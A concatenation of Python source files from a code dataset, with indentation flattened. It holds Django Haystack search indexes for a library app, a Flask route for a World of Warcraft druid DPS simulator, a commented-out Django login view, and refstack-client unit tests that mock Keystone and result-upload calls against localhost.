item_internal_location = indexes.CharField(null=True, model_attr='holdings__item_internal_location')
digital_file_name_path = indexes.CharField(null=True, model_attr='holdings__digital_file_name_path')
digital_file_name = indexes.CharField(null=True, model_attr='holdings__digital_file_name')
digital_file_ocrd = indexes.FacetBooleanField(null=True, model_attr='holdings__digital_file_ocrd')
digital_file_type_comments = indexes.CharField(null=True, model_attr='holdings__digital_file_type_comments')
'''
Review Fields
'''
summary = indexes.CharField(null=True, model_attr='review__summary')
people_mentioned = indexes.FacetMultiValueField()
plants = indexes.FacetMultiValueField()
animals = indexes.FacetMultiValueField()
mup_category = indexes.FacetCharField(null=True, model_attr='review__mup_category__name')
use_occupancy_category = indexes.FacetCharField(null=True, model_attr='review__use_occupancy_category__name')
full_text = indexes.FacetCharField(null=True, model_attr='review__full_text')
'''
ResearcherNotes Fields
'''
spreadsheet_id = indexes.FacetIntegerField(null=True, model_attr='researcher_notes__spreadsheet_id')
researcher_notes = indexes.CharField(null=True, model_attr='researcher_notes__researcher_notes')
actions_needed = indexes.CharField(null=True, model_attr='researcher_notes__actions_needed')
search_location = indexes.CharField(null=True, model_attr='researcher_notes__search_location')
search_terms = indexes.FacetCharField(null=True, model_attr='researcher_notes__search_terms')
search_results = indexes.CharField(null=True, model_attr='researcher_notes__search_results')
search_identifier = indexes.FacetCharField(null=True, model_attr='researcher_notes__search_identifier')
cross_reference = indexes.FacetCharField(null=True, model_attr='researcher_notes__cross_reference')
search_summary = indexes.CharField(null=True, model_attr='researcher_notes__search_summary')
def index_queryset(self, using=None):
'''
Get the default QuerySet to index when doing a full update.
Subclasses can override this method to avoid indexing certain objects.
:param using:
:return:
'''
# the super does this:
# self.get_model().objects.all()
qs = super(ItemIndex, self).index_queryset(using=using)
return qs
def prepare_tags(self, obj):
return [tag.name for tag in obj.tags.all()]
def prepare_collections(self, obj):
return [tag.name for tag in obj.collections.all()]
def prepare_file_names(self, obj):
return [file.name for file in obj.files.all()]
def prepare_people_mentioned(self, obj):
if obj.review:
return [tag.name for tag in obj.review.people_mentioned.all()]
else:
return None
def prepare_plants(self, obj):
if obj.review:
return [tag.name for tag in obj.review.plants.all()]
else:
return None
def prepare_animals(self, obj):
if obj.review:
return [tag.name for tag in obj.review.animals.all()]
else:
return None
class CaseBriefIndex(LibraryCommonIndexPropertiesMixin, indexes.SearchIndex, indexes.Indexable):
'''
Case Brief Index:
For guidance:
http://django-haystack.readthedocs.io/en/latest/best_practices.html#good-search-needs-good-content
Tags:
http://django-haystack.readthedocs.io/en/v2.4.1/searchindex_api.html#prepare-self-object
'''
def get_model(self):
return CaseBrief
# Main document index:
text = indexes.CharField(document=True, use_template=True)
document_template_name = 'search/indexes/library/casebrief_text.txt'
name = indexes.CharField(null=False, model_attr='story_title', boost=name_boost) # use story title for boosted name field
story_title = indexes.CharField(null=False, model_attr='story_title')
cataloger = indexes.CharField(model_attr='cataloger', null=True)
reviewer = indexes.CharField(model_attr='reviewer', null=True)
prefixed_id = indexes.CharField(model_attr='prefixed_id')
# sources =
source_notes = indexes.CharField()
issues = indexes.CharField()
facts = indexes.CharField()
decision = indexes.CharField()
reasons = indexes.FacetCharField()
notes = indexes.CharField()
tags = indexes.FacetMultiValueField()
keywords = indexes.FacetMultiValueField()
def prepare_tags(self, obj):
return [tag.name for tag in obj.tags.all()]
def prepare_keywords(self, obj):
return [keyword.name for keyword in obj.keywords.all()]
class SynthesisIndex(LibraryCommonIndexPropertiesMixin, indexes.SearchIndex, indexes.Indexable):
'''
Synthesis Index:
For guidance:
http://django-haystack.readthedocs.io/en/latest/best_practices.html#good-search-needs-good-content
'''
def get_model(self):
return Synthesis
# Main document index:
text = indexes.CharField(document=True, use_template=True)
document_template_name = 'search/indexes/library/synthesis_text.txt'
prefixed_id = indexes.CharField(model_attr='prefixed_id')
name = indexes.CharField(boost=name_boost)
class SynthesisItemIndex(LibraryCommonIndexPropertiesMixin, indexes.SearchIndex, indexes.Indexable):
'''
Synthesis Item Index:
For guidance:
http://django-haystack.readthedocs.io/en/latest/best_practices.html#good-search-needs-good-content
'''
def get_model(self):
return SynthesisItem
# Main document index:
text = indexes.CharField(document=True, use_template=True)
document_template_name = 'search/indexes/library/synthesisitem_text.txt'
subject = indexes.CharField()
overview = indexes.CharField()
# items = indexes.CharField()
# casebriefs = indexes.CharField()
synthesis_category = indexes.CharField(model_attr='category__name', null=True)
class CollectionTagIndex(LibraryCommonIndexPropertiesMixin, indexes.SearchIndex, indexes.Indexable):
'''
Collection Tag Index:
For guidance:
http://django-haystack.readthedocs.io/en/latest/best_practices.html#good-search-needs-good-content
'''
def get_model(self):
return CollectionTag
# Main document index:
text = indexes.CharField(document=True, use_template=True)
document_template_name = 'search/indexes/library/collectiontag_text.txt'
name = indexes.CharField(boost=name_boost)
description = indexes.CharField()
|
StarcoderdataPython
|
5019954
|
<gh_stars>0
from flask import (
Blueprint, flash, g, redirect, render_template, request, url_for
)
from werkzeug.exceptions import abort
from flask import current_app
from .encounter import Encounter
from .encounter_without_mana import Encounter_without_mana
from .buffs_list import Buffs_list
from .character import Character
bp = Blueprint('simulator', __name__)
@bp.route('/')
def index():
return render_template('simulator/index.html')
@bp.route('/formtest', methods=('GET', 'POST'))
def form_test():
intel = request.form['intel']
sp = request.form['sp']
return render_template('simulator/test_form.html', intellect=intel, spellpower=sp)
@bp.route('/simulate', methods=('GET', 'POST'))
def simulate_fight():
# Concernant les checkbox, quand une est decochee le parametre ne sera pas present dans le POST
if request.method == 'POST':
# Character creation from posted arguments
toon = Character(
intel = int(request.form['intel']),
spellpower = int(request.form['spellpower']),
hit_score = int(request.form['spell_hit']),
crit_score = int(request.form['spell_crit']),
haste = int(request.form['spell_haste']),
spirit = int(request.form['spirit']),
trinket1 = request.form['trinket1'],
trinket2 = request.form['trinket2'],
idol = request.form['idol'],
is_csd = 'is_csd' in request.form,
is_spellstrike = 'is_spellstrike' in request.form,
is_spellfire = 'is_spellfire' in request.form)
toon.set_talents(
balance_of_power = "balance_of_power" in request.form,
focused_starlight = "focused_starlight" in request.form,
moonkin_form = "moonkin_form" in request.form,
improved_mf = "improved_mf" in request.form,
starlight_wrath = "starlight_wrath" in request.form,
vengeance = "vengeance" in request.form,
lunar_guidance = "lunar_guidance" in request.form,
moonfury = "moonfury" in request.form,
dreamstate = int(request.form['dreamstate']),
intensity = int(request.form['intensity']),
wrath_of_cenarius = "wrath_of_cenarius" in request.form)
# Buffs from posted arguments
if "is_curse_of_elements" in request.form :
if "is_improved_coe" in request.form :
curse_of_elements = 1.13
else :
curse_of_elements = 1.1
else:
curse_of_elements = 1
# todo :
# is_manapot , is_rune, is_bowis , is_mana_oil, is_manapot, is_rune, is_innervate, is_mana_spring, is_spriest, is_judgment_of_wisdom, is_spirit_scroll
buffs = Buffs_list(
is_motw = 'is_motw' in request.form,
is_totem_of_wrath = "is_totem_of_wrath" in request.form,
is_divine_spirit = "is_divine_spirit" in request.form,
is_arcane_brilliance = "is_arcane_brilliance" in request.form,
is_wrath_of_air = "is_wrath_of_air" in request.form,
is_draenei_in_group = "is_draenei_in_group" in request.form,
curse_of_elements = curse_of_elements,
is_blessing_kings = "is_blessing_kings" in request.form,
is_crusader = "is_crusader" in request.form,
is_sham_4_piece = "is_sham_4_piece" in request.form,
is_flask = "is_flask" in request.form,
is_food = "is_food" in request.form,
is_oil = "is_oil" in request.form,
is_twilight_owl = "is_twilight_owl" in request.form,
is_eye_of_night = "is_eye_of_night" in request.form,
is_T5 = "is_T5" in request.form,
is_T6_2 = "is_T6_2" in request.form,
is_T6_4 = "is_T6_4" in request.form,
is_misery = "is_misery" in request.form,
is_drums = "is_drums" in request.form,
is_lust = "is_lust" in request.form,
lust_count = int(request.form["lust_count"]),
# Mana mana
is_manapot = "is_manapot" in request.form,
is_bowis = "is_bowis" in request.form,
is_mana_oil = "is_mana_oil" in request.form,
is_rune = "is_rune" in request.form,
is_innervate = "is_innervate" in request.form,
is_mana_spring = "is_mana_spring" in request.form,
is_shadow_priest = "is_shadow_priest" in request.form,
is_judgment_of_wisdom = "is_judgment_of_wisdom" in request.form,
shadow_priest_dps = int(request.form["shadow_priest_dps"]),
is_spirit_scroll = "is_spirit_scroll" in request.form)
is_mana_simulated = "is_mana_simulated" in request.form
if is_mana_simulated:
fight = Encounter(toon, buffs, int(request.form['fight_duration']))
computed_fight = fight.compute_dps(int(request.form['loop_count']))
average_dps = computed_fight[0]
logs = computed_fight[1]
else :
fight = Encounter_without_mana(toon, buffs, int(request.form['fight_duration']))
computed_fight = fight.compute_dps(int(request.form['loop_count']))
average_dps = computed_fight[0]
logs = computed_fight[1]
current_app.logger.info('Simulation launched successfully')
current_app.logger.info(str(buffs))
current_app.logger.info("###########################################################################################")
current_app.logger.info(logs)
# return render_template('simulator/simulated.html', dps = average_dps)
return render_template('simulator/index.html',
dps = average_dps,
is_mana_simulated = is_mana_simulated,
toon = toon,
buffs = buffs,
nb_loops = int(request.form['loop_count']),
nb_length = int(request.form['fight_duration']),
trink1 = request.form['trinket1'],
trink2 = request.form['trinket2'],
reqIdol = request.form['idol'],
intensity = int(request.form['intensity']),
dreamstate = int(request.form['dreamstate']),
fight_duration = int(request.form['fight_duration']))
return render_template('simulator/simulated.html')
#def get_simulation_result(id, check_author=True):
# post = get_db().execute(
# 'SELECT p.id, title, body, created, author_id, username'
# ' FROM post p JOIN user u ON p.author_id = u.id'
# ' WHERE p.id = ?',
# (id,)
# ).fetchone()
#
# if post is None:
# abort(404, f"Post id {id} doesn't exist.")
#
# if check_author and post['author_id'] != g.user['id']:
# abort(403)
#
# return render_template('simulator/index.html')
|
StarcoderdataPython
|
1727946
|
<reponame>AbhiyantrikTechnology/DentalHub-Backend<gh_stars>1-10
# import re
# import uuid
# from django.conf import settings
# from django.contrib.auth import authenticate, login as dj_login
# from rest_framework import status
# from rest_framework.views import APIView
# from rest_framework.response import Response
# from rest_framework import permissions
# from userapp.models import User, AppUser
# from userapp.serializers.appuser import AppUserSerializer
# from addressapp.models import Geography
# import logging
# # Get an instance of a logger
# logger = logging.getLogger(__name__)
# class IsPostOrIsAuthenticated(permissions.BasePermission):
# def has_permission(self, request, view):
# if request.method == 'POST':
# return True
# return request.user and request.user.is_authenticated
# class AppUserListView(APIView):
# permission_classes = (IsPostOrIsAuthenticated,)
# serializer_class = AppUserSerializer
# def get(self, request, format=None):
# if request.user.admin:
# user=AppUser.objects.filter(active=True)
# serializer = AppUserSerializer(user, many=True, \
# context={'request': request})
# return Response(serializer.data)
# logger.error("Access is denied.")
# return Response({"message":"Access is denied."},status=400)
# def post(self, request, format=None):
# serializer = AppUserSerializer(data=request.data,\
# context={'request': request})
# if AppUser.objects.filter(username=request.data['username']).exists():
# appuser=AppUser.objects.get(username=request.data['username'])
# user = authenticate(email=appuser.username, password=request.data['password'])
# if user:
# dj_login(request, user)
# return Response({"message":"Login successfull"},status=200)
# logger.error("password do not match")
# return Response({"message":"password do not match"},status=400)
# logger.error("username does not exists.")
# return Response({'message':'username does not exists.'},status=400)
# # logger.error("Access is denied.")
# # return Response({"message":"Access is denied."},status=400)
|
StarcoderdataPython
|
174752
|
#
# Copyright (c) 2014 Piston Cloud Computing, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import hashlib
import json
import logging
import os
import tempfile
import httmock
import mock
from mock import MagicMock
import unittest
from refstack_client import refstack_client as rc
class TestRefstackClient(unittest.TestCase):
test_path = os.path.dirname(os.path.realpath(__file__))
conf_file_name = '%s/refstack-client.test.conf' % test_path
def patch(self, name, **kwargs):
"""
:param name: Name of class to be patched
:param kwargs: directly passed to mock.patch
:return: mock
"""
patcher = mock.patch(name, **kwargs)
thing = patcher.start()
self.addCleanup(patcher.stop)
return thing
def mock_argv(self, command='test', **kwargs):
"""
Build argv for test.
:param conf_file_name: Configuration file name
:param verbose: verbosity level
:return: argv
"""
argv = [command]
if kwargs.get('verbose', None):
argv.append(kwargs.get('verbose', None))
if kwargs.get('silent', None):
argv.append(kwargs.get('silent', None))
argv.extend(['--url', 'http://127.0.0.1', '-y'])
if kwargs.get('priv_key', None):
argv.extend(('-i', kwargs.get('priv_key', None)))
if command == 'test':
argv.extend(
('-c', kwargs.get('conf_file_name', self.conf_file_name)))
if kwargs.get('test_cases', None):
argv.extend(('--', kwargs.get('test_cases', None)))
return argv
def mock_data(self):
"""
Mock the Keystone client methods.
"""
self.mock_identity_service_v2 = {'type': 'identity',
'endpoints': [{'id': 'test-id'}]}
self.mock_identity_service_v3 = {'type': 'identity',
'id': 'test-id'}
self.v2_config = {'auth_url': 'http://0.0.0.0:35357/v2.0/tokens',
'auth_version': 'v2',
'domain_name': 'Default',
'password': '<PASSWORD>',
'tenant_id': 'admin_project_id',
'project_id': 'admin_project_id',
'tenant_name': 'project_name',
'project_name': 'project_name',
'username': 'admin'}
def setUp(self):
"""
Test case setup
"""
logging.disable(logging.CRITICAL)
def test_verbose(self):
"""
Test different verbosity levels.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
self.assertEqual(client.logger.level, logging.INFO)
args = rc.parse_cli_args(self.mock_argv(verbose='-v'))
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
self.assertEqual(client.logger.level, logging.DEBUG)
args = rc.parse_cli_args(self.mock_argv(verbose='-vv'))
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
self.assertEqual(client.logger.level, logging.DEBUG)
args = rc.parse_cli_args(self.mock_argv(silent='-s'))
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
self.assertEqual(client.logger.level, logging.WARNING)
def test_get_next_stream_subunit_output_file(self):
"""
Test getting the subunit file from an existing .testrepository
directory that has a next-stream file.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
output_file = client._get_next_stream_subunit_output_file(
self.test_path)
# The next-stream file contains a "1".
expected_file = expected_file = self.test_path + "/.testrepository/1"
self.assertEqual(expected_file, output_file)
def test_get_next_stream_subunit_output_file_nonexistent(self):
"""
Test getting the subunit output file from a nonexistent
.testrepository directory.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
output_file = client._get_next_stream_subunit_output_file(
"/tempest/path")
expected_file = "/tempest/path/.testrepository/0"
self.assertEqual(expected_file, output_file)
def test_get_cpid_account_file_not_found(self):
"""
Test that the client will exit if an accounts file is specified,
but does not exist.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
client.conf.add_section('auth')
client.conf.set('auth',
'test_accounts_file',
'%s/some-file.yaml' % self.test_path)
self.mock_data()
with self.assertRaises(SystemExit):
client._get_keystone_config(client.conf)
def test_get_keystone_config_account_file_empty(self):
"""
Test that the client will exit if an accounts file exists,
but is empty.
"""
self.patch(
'refstack_client.refstack_client.read_accounts_yaml',
return_value=None)
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
client.conf.add_section('auth')
client.conf.set('auth',
'test_accounts_file',
'%s/some-file.yaml' % self.test_path)
self.mock_data()
with self.assertRaises(SystemExit):
client._get_keystone_config(client.conf)
def test_get_keystone_config_no_accounts_file(self):
"""
Test that the client will exit if accounts file
is not specified.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
self.mock_data()
with self.assertRaises(SystemExit):
client._get_keystone_config(client.conf)
def test_get_keystone_config(self):
"""
Test that keystone configs properly parsed.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
client.conf.add_section('auth')
client.conf.set('auth',
'test_accounts_file',
'%s/test-accounts.yaml' % self.test_path)
self.mock_data()
accounts = [
{
'username': 'admin',
'project_name': 'project_name',
'project_id': 'admin_project_id',
'password': '<PASSWORD>'
}
]
self.patch(
'refstack_client.refstack_client.read_accounts_yaml',
return_value=accounts)
actual_result = client._get_keystone_config(client.conf)
expected_result = self.v2_config
self.assertEqual(expected_result, actual_result)
def test_get_cpid_from_keystone_by_tenant_name_from_account_file(self):
"""
Test getting a CPID from Keystone using an admin tenant name
from an accounts file.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
client.conf.add_section('auth')
client.conf.set('auth',
'test_accounts_file',
'%s/test-accounts.yaml' % self.test_path)
self.mock_data()
actual_result = client._get_keystone_config(client.conf)
expected_result = None
self.assertEqual(expected_result, actual_result['tenant_id'])
accounts = [
{
'username': 'admin',
'tenant_id': 'tenant_id',
'password': '<PASSWORD>'
}
]
self.patch(
'refstack_client.refstack_client.read_accounts_yaml',
return_value=accounts)
actual_result = client._get_keystone_config(client.conf)
self.assertEqual('tenant_id', actual_result['tenant_id'])
def test_generate_keystone_data(self):
"""Test that correct data is generated."""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
client.conf.add_section('auth')
client.conf.set('auth',
'test_accounts_file',
'%s/test-accounts.yaml' % self.test_path)
self.mock_data()
accounts = [
{
'username': 'admin',
'tenant_id': 'admin_tenant_id',
'password': '<PASSWORD>'
}
]
self.patch(
'refstack_client.refstack_client.read_accounts_yaml',
return_value=accounts)
configs = client._get_keystone_config(client.conf)
actual_results = client._generate_keystone_data(configs)
expected_results = ('v2', 'http://0.0.0.0:35357/v2.0/tokens',
{'auth':
{'passwordCredentials':
{
'username': 'admin', 'password': '<PASSWORD>'
},
'tenantId': 'admin_tenant_id'}})
self.assertEqual(expected_results, actual_results)
def test_get_cpid_from_keystone_v3_varying_catalogs(self):
"""
Test getting the CPID from keystone API v3 with varying catalogs.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
client.conf.set('identity-feature-enabled', 'api_v3', 'true')
client.conf.add_section('auth')
client.conf.set('auth',
'test_accounts_file',
'%s/test-accounts.yaml' % self.test_path)
self.mock_data()
accounts = [
{
'tenant_name': 'tenant_name'
}
]
self.patch(
'refstack_client.refstack_client.read_accounts_yaml',
return_value=accounts)
configs = client._get_keystone_config(client.conf)
auth_version, auth_url, content = \
client._generate_keystone_data(configs)
client._generate_cpid_from_endpoint = MagicMock()
# Test when the identity ID is None.
ks3_ID_None = {'token': {'catalog':
[{'type': 'identity', 'id': None}]}}
@httmock.all_requests
def keystone_api_v3_mock(url, request):
return httmock.response(201, ks3_ID_None)
with httmock.HTTMock(keystone_api_v3_mock):
client._get_cpid_from_keystone(auth_version, auth_url, content)
client._generate_cpid_from_endpoint.assert_called_with(auth_url)
# Test when the catalog is empty.
ks3_catalog_empty = {'token': {'catalog': []}}
client._generate_cpid_from_endpoint = MagicMock()
@httmock.all_requests
def keystone_api_v3_mock2(url, request):
return httmock.response(201, ks3_catalog_empty)
with httmock.HTTMock(keystone_api_v3_mock2):
client._get_cpid_from_keystone(auth_version, auth_url, content)
client._generate_cpid_from_endpoint.assert_called_with(auth_url)
# Test when there is no service catalog.
ks3_no_catalog = {'token': {}}
client._generate_cpid_from_endpoint = MagicMock()
@httmock.all_requests
def keystone_api_v3_mock3(url, request):
return httmock.response(201, ks3_no_catalog)
with httmock.HTTMock(keystone_api_v3_mock3):
client._get_cpid_from_keystone(auth_version, auth_url, content)
client._generate_cpid_from_endpoint.assert_called_with(auth_url)
# Test when catalog has other non-identity services.
ks3_other_services = {'token': {
'catalog': [{'type': 'compute',
'id': 'test-id1'},
{'type': 'identity',
'id': 'test-id2'}]
}}
client._generate_cpid_from_endpoint = MagicMock()
@httmock.all_requests
def keystone_api_v3_mock4(url, request):
return httmock.response(201, ks3_other_services)
with httmock.HTTMock(keystone_api_v3_mock4):
cpid = client._get_cpid_from_keystone(auth_version,
auth_url,
content)
self.assertFalse(client._generate_cpid_from_endpoint.called)
self.assertEqual('test-id2', cpid)
def test_get_cpid_from_keystone_failure_handled(self):
"""Test that get cpid from keystone API failure handled."""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
client.logger.warning = MagicMock()
client._generate_cpid_from_endpoint = MagicMock()
client.conf.add_section('auth')
client.conf.set('auth',
'test_accounts_file',
'%s/test-accounts.yaml' % self.test_path)
self.mock_data()
accounts = [
{
'tenant_name': 'tenant_name',
'tenant_id': 'admin_tenant_id',
'password': '<PASSWORD>'
}
]
self.patch(
'refstack_client.refstack_client.read_accounts_yaml',
return_value=accounts)
configs = client._get_keystone_config(client.conf)
auth_version, url, content = client._generate_keystone_data(configs)
@httmock.urlmatch(netloc=r'(.*\.)?127.0.0.1$', path='/v2/tokens')
def keystone_api_mock(auth_version, url, request):
return None
with httmock.HTTMock(keystone_api_mock):
client._get_cpid_from_keystone(auth_version, url, content)
client._generate_cpid_from_endpoint.assert_called_with(url)
def test_generate_cpid_from_endpoint(self):
"""
Test that an endpoint's hostname is properly hashed.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
cpid = client._generate_cpid_from_endpoint('http://some.url:5000/v2')
expected = hashlib.md5('some.url'.encode('utf-8')).hexdigest()
self.assertEqual(expected, cpid)
with self.assertRaises(ValueError):
client._generate_cpid_from_endpoint('some.url:5000/v2')
def test_form_result_content(self):
"""
Test that the request content is formed into the expected format.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
content = client._form_result_content(1, 1, ['tempest.sample.test'])
expected = {'cpid': 1,
'duration_seconds': 1,
'results': ['tempest.sample.test']}
self.assertEqual(expected, content)
def test_save_json_result(self):
"""
Test that the results are properly written to a JSON file.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
results = {'cpid': 1,
'duration_seconds': 1,
'results': ['tempest.sample.test']}
temp_file = tempfile.NamedTemporaryFile()
client._save_json_results(results, temp_file.name)
# Get the JSON that was written to the file and make sure it
# matches the expected value.
json_file = open(temp_file.name)
json_data = json.load(json_file)
json_file.close()
self.assertEqual(results, json_data)
def test_get_passed_tests(self):
"""
Test that only passing tests are retrieved from a subunit file.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
subunit_file = self.test_path + "/.testrepository/0"
results = client.get_passed_tests(subunit_file)
expected = [
{'name': 'tempest.passed.test'},
{'name': 'tempest.tagged_passed.test',
'uuid': '0146f675-ffbd-4208-b3a4-60eb628dbc5e'}
]
self.assertEqual(expected, results)
@mock.patch('six.moves.input')
def test_user_query(self, mock_input):
client = rc.RefstackClient(rc.parse_cli_args(self.mock_argv()))
self.assertTrue(client._user_query('42?'))
mock_input.return_value = 'n'
cli_args = self.mock_argv()
cli_args.remove('-y')
client = rc.RefstackClient(rc.parse_cli_args(cli_args))
self.assertFalse(client._user_query('42?'))
mock_input.return_value = 'yes'
self.assertTrue(client._user_query('42?'))
def test_upload_prompt(self):
"""
Test the _upload_prompt method.
"""
client = rc.RefstackClient(rc.parse_cli_args(self.mock_argv()))
# When user says yes.
client._user_query = MagicMock(return_value=True)
client.post_results = MagicMock()
client._upload_prompt({'some': 'data'})
client.post_results.assert_called_with(
'http://127.0.0.1', {'some': 'data'}, sign_with=None
)
# When user says no.
client._user_query = MagicMock(return_value=False)
client.post_results = MagicMock()
client._upload_prompt({'some': 'data'})
self.assertFalse(client.post_results.called)
def test_post_results(self):
"""
Test the post_results method, ensuring a requests call is made.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.logger.info = MagicMock()
content = {'duration_seconds': 0,
'cpid': 'test-id',
'results': [{'name': 'tempest.passed.test', 'uid': None}]}
expected_response = json.dumps({'test_id': 42})
@httmock.urlmatch(netloc=r'(.*\.)?127.0.0.1$', path='/v1/results/')
def refstack_api_mock(url, request):
return expected_response
with httmock.HTTMock(refstack_api_mock):
client.post_results("http://127.0.0.1", content)
client.logger.info.assert_called_with(
'http://127.0.0.1/v1/results/ Response: '
'%s' % expected_response)
def test_post_results_with_sign(self):
"""
Test the post_results method, ensuring a requests call is made.
"""
argv = self.mock_argv(command='upload', priv_key='rsa_key')
argv.append('fake.json')
args = rc.parse_cli_args(argv)
client = rc.RefstackClient(args)
client.logger.info = MagicMock()
content = {'duration_seconds': 0,
'cpid': 'test-id',
'results': [{'name': 'tempest.passed.test'}]}
expected_response = json.dumps({'test_id': 42})
@httmock.urlmatch(netloc=r'(.*\.)?127.0.0.1$', path='/v1/results/')
def refstack_api_mock(url, request):
return expected_response
with httmock.HTTMock(refstack_api_mock):
rsapath = os.path.join(self.test_path, 'rsa_key')
client.post_results("http://127.0.0.1", content, sign_with=rsapath)
client.logger.info.assert_called_with(
'http://127.0.0.1/v1/results/ Response: %s' %
expected_response)
def test_run_tempest(self):
"""
Test that the test command will run the tempest script using the
default configuration.
"""
args = rc.parse_cli_args(
self.mock_argv(verbose='-vv', test_cases='tempest.api.compute'))
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
mock_popen = self.patch(
'refstack_client.refstack_client.subprocess.Popen',
return_value=MagicMock(returncode=0))
self.patch("os.path.isfile", return_value=True)
self.mock_data()
client.get_passed_tests = MagicMock(return_value=[{'name': 'test'}])
client.logger.info = MagicMock()
client._save_json_results = MagicMock()
client.post_results = MagicMock()
client._get_keystone_config = MagicMock(
return_value=self.v2_config)
client.test()
mock_popen.assert_called_with(
['%s/tools/with_venv.sh' % self.test_path, 'tempest', 'run',
'--serial', '--regex', 'tempest.api.compute'],
stderr=None
)
self.assertFalse(client.post_results.called)
def test_run_tempest_upload(self):
"""
Test that the test command will run the tempest script and call
post_results when the --upload argument is passed in.
"""
argv = self.mock_argv(verbose='-vv',
test_cases='tempest.api.compute')
argv.insert(2, '--upload')
args = rc.parse_cli_args(argv)
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
mock_popen = self.patch(
'refstack_client.refstack_client.subprocess.Popen',
return_value=MagicMock(returncode=0))
self.patch("os.path.isfile", return_value=True)
self.mock_data()
client.get_passed_tests = MagicMock(return_value=['test'])
client.post_results = MagicMock()
client._save_json_results = MagicMock()
client._get_keystone_config = MagicMock(
return_value=self.v2_config)
client._get_cpid_from_keystone = MagicMock()
client.test()
mock_popen.assert_called_with(
['%s/tools/with_venv.sh' % self.test_path, 'tempest', 'run',
'--serial', '--regex', 'tempest.api.compute'],
stderr=None
)
self.assertTrue(client.post_results.called)
def test_run_tempest_upload_with_sign(self):
"""
Test that the test command will run the tempest script and call
post_results when the --upload argument is passed in.
"""
argv = self.mock_argv(verbose='-vv', priv_key='rsa_key',
test_cases='tempest.api.compute')
argv.insert(2, '--upload')
args = rc.parse_cli_args(argv)
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
mock_popen = self.patch(
'refstack_client.refstack_client.subprocess.Popen',
return_value=MagicMock(returncode=0)
)
self.patch("os.path.isfile", return_value=True)
self.mock_data()
client.get_passed_tests = MagicMock(return_value=['test'])
client.post_results = MagicMock()
client._save_json_results = MagicMock()
client._get_keystone_config = MagicMock(
return_value=self.v2_config)
client._get_cpid_from_keystone = MagicMock(
return_value='test-id')
client.test()
mock_popen.assert_called_with(
['%s/tools/with_venv.sh' % self.test_path, 'tempest', 'run',
'--serial', '--regex', 'tempest.api.compute'],
stderr=None
)
self.assertTrue(client.post_results.called)
client.post_results.assert_called_with(
'http://127.0.0.1',
{'duration_seconds': 0,
'cpid': 'test-id',
'results': ['test']},
sign_with='rsa_key'
)
@mock.patch('refstack_client.list_parser.TestListParser.'
'create_include_list')
@mock.patch('refstack_client.list_parser.'
'TestListParser.get_normalized_test_list')
def test_run_tempest_with_test_list(self, mock_normalize,
mock_include_list):
"""Test that the Tempest script runs with a test list file."""
argv = self.mock_argv(verbose='-vv')
argv.extend(['--test-list', 'test-list.txt'])
args = rc.parse_cli_args(argv)
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
mock_popen = self.patch(
'refstack_client.refstack_client.subprocess.Popen',
return_value=MagicMock(returncode=0))
self.patch("os.path.isfile", return_value=True)
self.patch("os.path.getsize", return_value=4096)
self.mock_data()
client.get_passed_tests = MagicMock(return_value=[{'name': 'test'}])
client._save_json_results = MagicMock()
client.post_results = MagicMock()
mock_normalize.return_value = '/tmp/some-list'
mock_include_list.return_value = '/tmp/some-list'
client._get_keystone_config = MagicMock(
return_value=self.v2_config)
client.test()
mock_include_list.assert_called_with('test-list.txt')
# TODO(kopecmartin) rename the below argument when refstack-client
# uses tempest which contains the following change in its code:
# https://review.opendev.org/c/openstack/tempest/+/768583
mock_popen.assert_called_with(
['%s/tools/with_venv.sh' % self.test_path, 'tempest', 'run',
'--serial', '--whitelist_file', '/tmp/some-list'],
stderr=None
)
def test_run_tempest_no_conf_file(self):
"""
Test when a nonexistent configuration file is passed in.
"""
args = rc.parse_cli_args(self.mock_argv(conf_file_name='ptn-khl'))
client = rc.RefstackClient(args)
self.assertRaises(SystemExit, client.test)
def test_forbidden_conf_file(self):
"""
Test when the user passes in a file that the user does not have
read access to.
"""
file = tempfile.NamedTemporaryFile()
# Remove read access
os.chmod(file.name, 0o220)
args = rc.parse_cli_args(self.mock_argv(conf_file_name=file.name))
client = rc.RefstackClient(args)
self.assertRaises(SystemExit, client.test)
